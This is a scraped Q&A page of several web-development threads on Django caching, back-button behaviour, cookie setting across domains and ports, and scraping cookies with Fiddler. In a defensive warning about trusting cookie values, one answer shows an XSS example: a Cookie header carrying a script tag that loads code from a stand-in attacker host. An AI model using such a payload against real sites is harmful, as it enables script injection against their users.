Setting up cache with Django to work around the "page has expired" IE problem

Setting up cache with Django to work around the "page has expired" IE problem - django

I have got a familiar problem. I am using Django-0.97, and cannot upgrade -- though the version of Django being used should not play any part in the cause of the problem.
I have a search view that presents a form to the user, and, on submission of the form via POST, performs heavy computations and displays a list of items that are generated as a result of those computations. Users may click on the "more info" link of any of those items to view the item detail page.
Users on IE, once they are on the item detail page for any item from the search results page, get the familiar "webpage has expired, click on refresh button, yadda yadda yadda" error when they hit the "back" button on the browser. Sadly, a good majority of the users of the site use IE, are not tech savvy, and are complaining about this problem.
Thinking that setting up a cache backend may solve the problem, I configured a simple cache backend. I juggled with per-site cache and per-view cache, but to no avail. And now, I am not too sure I have set up the cache stuff properly.
Any hints, suggestions that may help in mitigating the problem will be hugely appreciated.
Thanks.
UPDATE (20 July 2009)
I have used Fiddler to inspect the HTTP headers of both the request and response. IE is sending the Pragma: no-cache header in the POST request. The HTTP response generated as a result of the request has the following headers:
Cache-Control: public, max-age=3600
Date: someDateHere
Vary: Cookie
And, yes, I am not using the PRG pattern.

You may find you need to use the PRG pattern (Post/Redirect/Get). With this pattern, the handler for the POST will:
perform the heavy computations, determine the search results, and store them in the user's session (or store them in the db keyed by the user's session).
Send a response with a redirect header to an idempotent page, which is then fetched by the browser using a GET, when it follows the redirection.
When the redirected-to page is accessed, the server displays the search results page, computed from the stored data in the session, and at a different URL from the URL that was POSTed to. You should be able to use normal caching headers for this (search results) page, depending on how volatile your search results will be.

Under RFC2616, "POST" is not an idempotent method, which means that the browser will not resend the request unless the user confirms that resend. So, to prevent the prompt, you must ensure that the CLIENT caches the page.
To do so, use the Cache Control header: http://www.fiddler2.com/redir/?id=httpperf and ensure that you are not sending back any Vary or Pragma: no-cache headers: http://blogs.msdn.com/ieinternals/archive/2009/06/17/9769915.aspx
It would be helpful for you to capture your HTTP POST's response headers (e.g. with Fiddler) and update your question with them.

Related

Cache website to browser when navigating back

I have a single url/page of my website that I want to be cached to browser, so whenever a user navigates away from that page, and then presses the BACK button of the browser, I don't want that request to go to django at all, but serve the cached version of the page that is in the browser. Also, I can't use solutions that cache the page in between the web server and Django, as every user has different permissions on what data they can see.
So I added this in my nginx config:
...
location /search {
expires 300s;
add_header Cache-Control "private";
...
And this works very well, 50% of the time :). How can I make it work always?

whenever a user navigates away from that page, and then presses the BACK button of the browser, I don't want that request to go to django at all, but serve the cached version of the page that is in the browser
For some browsers, this is the default behavior - if you have set no caching directives on the server, then it will keep not only a copy of the response but the entire rendered page in memory so than when you click the back button, it can be shown instantly.
But if you want to explicitly instruct the browser to cache the response you can use a max-age directive on the Cache-Control header. Set
Cache-Control: max-age=3600
This is a more modern and reliable way than using an "Expires" header, especially for small durations. If the user's browser has the incorrect time or time zone set "Expires" might not work at all, but "max-age" still should.
If you are serving each person a different version of the page you can add the "private" too to prevent caching by proxies (as in your example):
Cache-Control: private; max-age=3600
Note: you can't force a browser to always use the cache. If you are noticing that sometimes it doesn't use the cache, it could be:
The item in the cache has expired. You were giving it only 5 minutes, so 5 minutes after the request that went into the cache, if you request it again it will send through the request to the remote server - even if there have been requests in the time between.
The browser cache became full and some items were purged.
For some reason the browser believed or was configured to believe that the response should not be cached regardless of cache directives.
The user pressed reload.
A proxy between client and server stripped the Cache-Control or other headers.

Can I set a cookie in this situation?

I want to post a banner ad on a.com, for this to happen, a.com has to query b.com for the banner url via jsonp. When requested, b.com returns something like this:
{
img_url: www.c.com/banner.jpg
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purpose.
I have no control of a.com, so I cannot write any client side JS or ask them to include any external js files. I can only expose a query url on b.com for a.com's programmer to query
I have total control of b.com and c.com
When a.com receives the banner url via JSONP, it will insert the banner dynamically into its DOM for displaying purpose
A small follow up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevents c.com to set any third-party cookies?

is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com then www.c.com could include cookie setting headers in its request.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.

Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
The choice is up to you in terms of how much parsing you want to do of the values. Also note that there are many cookie attributes you may consider setting.
Caveats
Some modern browsers and ad-blocking extensions will block these
cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some
firewalls. These can be restrictions in per-cookie length, length
of sum of cookies per domain, or just number of cookies. I've
encountered a firewall that allowed a certain number of bytes in
Cookie: request headers and dropped all Cookie: headers beyond
that size. Some older mobile devices have very small limits on cookie
size.
Cookies are editable by the user and can be tampered with by
men-in-the-middle.
Consider adding an authenticator over your cookie value such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against
replay attacks unless you
include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that jsonp is really, really dangerous to the users of site www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.

Set-Cookie for a login system

I've run into a few problems with setting cookies, and based on the reading I've done, this should work, so I'm probably missing something important.
This situation:
Previously I received responses from my API and used JavaScript to save them as cookies, but then I found that using the set-cookie response header is more secure in a lot of situations.
I have 2 cookies: "nuser" (contains a username) and key (contains a session key). nuser shouldn't be httpOnly so that JavaScript can access it. Key should be httpOnly to prevent rogue scripts from stealing a user's session. Also, any request from the client to my API should contain the cookies.
The log-in request
Here's my current implementation: I make a request to my login api at localhost:8080/login/login (keep in mind that the web-client is hosted on localhost:80, but based on what I've read, port numbers shouldn't matter for cookies)
First the web-browser will make an OPTIONS request to confirm that all the headers are allowed. I've made sure that the server response includes access-control-allow-credentials to alert the browser that it's okay to store cookies.
Once it's received the OPTIONS request, the browser makes the actual POST request to the login API. It sends back the set-cookie header and everything looks good at this point.
The Problems
This set-up yields 2 problems. Firstly, though the nuser cookie is not httpOnly, I don't seem to be able to access it via JavaScript. I'm able to see nuser in my browser's cookie option menu, but document.cookie yeilds "".
Secondly, the browser seems to only place the Cookie request header in requests to the exact same API (the login API):
But, if I do a request to a different API that's still on my localhost server, the cookie header isn't present:
Oh, and this returns a 406 just because my server is currently configured to do that if the user isn't validated. I know that this should probably be 403, but the thing to focus on in this image is the fact that the "cookie" header isn't included among the request headers.
So, I've explained my implementation based on my current understanding of cookies, but I'm obviously missing something. Posting exactly what the request and response headers should look like for each task would be greatly appreciated. Thanks.

Okay, still not exactly what was causing the problem with this specific case, but I updated my localhost:80 server to accept api requests, then do a subsequent request to localhost:8080 to get the proper information. Because the set-cookie header is being set by localhost:80 (the client's origin), everything worked fine. From my reading before, I thought that ports didn't matter, but apparently they do.

Django #login_required views still show when users are logged out by going back in history on Chrome

::Edit::
#cache_control(no_cache=True, must_revalidate=True, no_store=True) FTW!!!!!
Cache-Control: no-cache, no-store, must-revalidate did the trick. It took going to a few IRC chans and looking around but finally I got it to work.
::EDIT::
I have a view where I'm setting #login_required on it and its secure for the most part, but if you have looked at the view then logout and just hit the back button in your browser you can view the content again with out being asked to login. Though if you refresh the page the server with will redirect you.
My suspension is its a cache issue where maybe I need to tell chrome not to store it in the history.
if you view a invoice for example then logout you can view the invoice again by selecting that page in your back history.
I have tried this issue o firefox with no problem. firefox asks for you to log back end so it must be a browser issue.

You're right, this is cache problem.
You can use cache_control decorator to force no cache on views[1]:
from django.views.decorators.cache import cache_control
#cache_control(no_cache=True, must_revalidate=True, no_store=True)
def func()
#some code
return
You should also write your own decorator that replaces #login_required so that you don't need to use both on every page.
[1] Disable browser 'Back' button after logout?

This behavior is caused by a feature in Webkit browsers unofficially called Page Cache, also known as the back/forward cache. It controls what happens to previous pages in the current browsing session. Webkit does something special in that it "suspends" previous pages. It's as if the previous page is hidden in another tab; clicking the back button is like bringing the tab into the foreground. The page is still there just as it was. This means no network request is made and therefore your server logic is never touched.
You'll see this behavior in Safari as well as Chrome. Look at the Network Inspector panel and watch the network traffic when you click back to a page. At a glance it looks like a request was made. Safari doesn't help dispel the notion that no request was actually made. Chrome is more polite and tells you the page was loaded "(from cache)". In Chrome, look at the size column or click the request and look at the Status Code in the Headers tab. Of course the other indicator is how long the 'request' took in the Timeline (probably 0ms).
That explains the behavior...now how to get around it. The best solution may just be a reminder on the logout page to close the browser window.
You've correctly determined that there's nothing you can do on the Django side. The cache decorators won't help you. Unfortunately there doesn't appear to be a canonical answer to preventing Page Cache from stashing a page. It also seems to be a feature in flux, so a solution now may just be a hack that won't work on later versions of Webkit. Or Firefox may create a similar feature with different implementation.
Serving your site over HTTPS with cache-control: no-store or cache-control: no-cache may do it but it's heavy handed for sure. One possible hack would be to set an unload/onunload event handler.
Read more about Page Cache behavior and the unload hack suggestion on these two Surfin' Safari articles.
UPDATE - #DigitalCake found that Cache-Control:no-store has some effect. In Django, this is accomplished with #cache_control(no_store=True) decorating the view. no store works in Chrome (v17.0.963.66) - the page is not stashed in Page Cache and the back button causes a network request. no store does not work in Safari (v5.1.3). This shows that even across Webkit browsers Page Cache is implemented differently. It demonstrates also the point that current work arounds are likely to be temporary hacks.

I tried this solution and it worked for me.
I had put both cashe control and login required.
Here is the example
from django.contrib.auth.decorators import login_required
from django.views.decorators.cache import cache_control
#cache_control(no_cache=True, must_revalidate=True, no_store=True)
#login_required(login_url='login')
def myview(request):
return HttpResponse(render(request,'path_to_your_view.html'))

March 2020 update: Adding to the accepted answer, the Django 3.0 docs show a never_cache decorator.
It adds a Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private header to the response.

question about cookie

I'm stuck in a cookie related question. I want to write a program that can automate download the attachments of this forum. So I should maintain the cookies this site send to me. When I send a GET request in my program to the login page, I got the cookie such as Set-Cookie: sso_sid=0589a967; domain=.it168.com in my program. Now if I use a cookie viewer such as cookie monster and send the same GET request, my program get the same result, but the cookie viewer shows that the site also send me two cookies which are:
testcookie http://get2know.it/myimages/2009-12-27_072438.jpg and token http://get2know.it/myimages/2009-12-27_072442.jpg
My question is: Where did the two cookie came from? Why they did not show in my program?
Thanks.

Your best bet to figure out screen-scraping problems like this one is to use Fiddler. Using Fiddler, you can compare exactly what is going over the wire in your app vs. when accessing the site from a browser. I suspect you'll see some difference between headers sent by your app vs. headers sent by the browser-- this will likley account for the difference you're seeing.
Next, you can do one of two things:
change your app to send exactly the headers that the browser does (and, if you do this, you should get exactly the response that a real browser gets).
using Fiddler's "request builder" feature, start removing headers one by one and re-issuing the request. At some point, you'll remove a header which makes the response not match the response you're looking for. That means that header is required. Continue for all other headers until you have a list of headers that are required by the site to yield the response you want.
Personally, I like option #2 since it requires a minimum amount of header-setting code, although it's harder initially to figure out which headers the site requires.
On your actual question of why you're seeing 2 cookies, only the diagnosis above will tell you for sure, but I suspect it may have to do with the mechanism that some sites use to detect clients who don't accept cookies. On the first request in a session, many sites will "probe" a client to see if the client accepts cookies. Typically they'll do this:
if the request doesn't have a cookie on it, the site will redirect the client to a special "cookie setting" URL.
The redirect response, in addition to having a Location: header which does the redirect, will also return a Set-Cookie header to set the cookie. The redirect will typically contain the original URL as a query string parameter.
The server-side handler for the "cookie setter" page will then look at the incoming cookie. If it's blank, this means that the user's browser is set to not accept cookies, and the site will typically redirect the user to a "sorry, you must use cookies to use this site" page.
If, however, there is a cookie header send to the "cookie setter" URL, then the client does in fact accept cookies, and the handler will simply redirect the client back to the original URL.
The original URL, once you move on to the next page, may add an additional cookie (e.g. for a login token).
Anyway, that's one way you could end up with two cookies. Only diagnosis with Fiddler (or a similar tool) will tell you for sure, though.

We Keep Coding

c++ django amazon-web-services regex python-2.7 google-cloud-platform list unit-testing opengl ember.js